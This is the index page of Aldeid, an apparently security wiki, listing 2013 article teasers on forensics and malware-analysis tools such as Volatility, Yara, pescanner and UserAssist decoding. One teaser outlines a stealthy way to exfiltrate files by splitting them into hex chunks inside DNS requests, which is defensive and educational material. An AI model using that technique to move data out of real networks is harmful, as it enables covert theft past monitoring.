Main Page

From Aldeid
Jump to: navigation, search

Pentesting   •    Network   •    Web Hacking   •    Digital Forensics   •    Research

send me a mail follow me on twitter follow me on dig follow me on facebook packetstorm tools linkedin profile subscribe rss feed follow me on youtube follow me on google+

Windows-userassist-keys-icon.png

Decrypting UserAssist registry keys

Sun, 07 April 2013 14:18:00 +0200

Windows systems maintain a set of keys in the registry database (UserAssist keys) to keep track of programs that executed. The number of executions and last execution date and time are available in these keys. The information within the binary UserAssist values contains only statistical data on the applications launched by the user via Windows Explorer. Programs launched via the command­line (cmd.exe) do not appear in these registry keys. From a forensics perspective, being able to decode this information can be very useful.

Read more

Winprefetchview-icon.png

WinPrefetchView reads information contained in Windows prefetch files

Tue, 02 April 2013 22:22:00 +0200

Each time an application is run in a Windows based system, registry keys and a prefetch file (%windir%\*.pf) which contains information about the files loaded by the application are created. The information in the prefetch files are used for optimizing the loading time of the application for the next times it will be run. WinPrefetchView is a small utility that reads the prefetch files and displays the information stored in them (files used, files loaded on Windows boot).

Read more

Jsunpackn.png

Jsunpack-n, the CLI version of Jsunpack

Sat, 09 Mar 2013 09:20:00 +0100

Jsunpack-n is a command-line Javascript unpacker that has more or less the same features as the Web version of Jsunpack

Read more

Pescanner.png

pescanner.py, a PE analyzer

Sun, 03 Mar 2013 15:26:00 +0100

pescanner.py is a PE analyzer written in python by the authors of the Malware Analysts Cookbook. It is available in the companion DVD shipped by the book but is also freely distributed on Google code. The script has the ability to detect files with TLS entries, files with resource directories, suspicious IAT entries, suspicious entry point sections, sections with zero-length raw sizes, sections with extremely low or high entropy, invalid timestamps and file version information. Among other things, this script is helpful to understand the behavior of an executable and classify malwares (UPX packed, trojan downloader, trojan dropper, ...).

Read more

Volatility-example.png

From AlienVault SIEM alarms to identification of infected files on the compromised machine

Mon, 25 Feb 2013 13:31:00 +0100

This article shows how to dig into the memory dump using volatility to identify malwares found on a Windows XP machine, initially detected with the AlienVault SIEM.

Read more

Volatility.png

Volatility framework explained

Sun, 24 Feb 2013 08:26:00 +0100

The Volatility Framework is a completely open collection of tools, implemented in Python under the GNU General Public License, for the extraction of digital artifacts from volatile memory (RAM) samples. The extraction techniques are performed completely independent of the system being investigated but offer visibiltiy into the runtime state of the system. The framework is intended to introduce people to the techniques and complexities associated with extracting digital artifacts from volatile memory samples and provide a platform for further work into this exciting area of research.

Read more

Yara.png

Yara to analyze malwares

Sun, 17 Feb 2013 18:18:00 +0100

Yara is a very powerful tool aimed at helping malware researchers to identify and classify malware samples. It is based on signatures files that offer a great flexibility: hex, string, regular expressions, ... Yara is available as a standalone application, or a python port that you can use for your own developments. Yara is also included as an available plugin in volatility.

Read more

File-transfer-via-dns.png

File Transfer Via DNS

Sat, 16 Feb 2013 14:51:00 +0100

You guys already know DNS encapsulation (e.g. dns2tcp) to transfer data over DNS but I've found a very interesting post from Johannes Ullrich who introduces a relatively stealthy concept to transfer data via DNS requests. It consists of sending hex parts of a file as part of DNS requests on one side and to capture and split these DNS requests on the other side. No specific tool is required but tcpdump and xxd.

Read more

Xortool.png

Decrypt XOR encrypted files with xortool.py

Sat, 16 Feb 2013 10:10:00 +0100

Xortool.py is a python based script that performs some XOR analysis: guess the key length (based on count of equal chars), guess the key (based on knowledge of most probable char) and decrypt a XOR encrypted file.

Read more

Write-alienvault-plugin.png

Write AlienVault Plugins

Thu, 14 Feb 2013 18:18:00 +0100

This document explains how to write a plugin for AlienVault in order to integrate logs from an external device (and for which a plugin does not exist yet) to generate SIEM events, and make correlation to generate alarms based on these events. The current example is to integrate logs from a 3Com ADSL 11g WiFi router and write a correlation directive to track authentication bruteforce attempts.

Read more


Older entries »

Retrieved from "http://www.aldeid.com/w/index.php?title=Main_Page&oldid=20066"
Personal tools
Namespaces

Variants
Actions
Security
Menu
Misc
Toolbox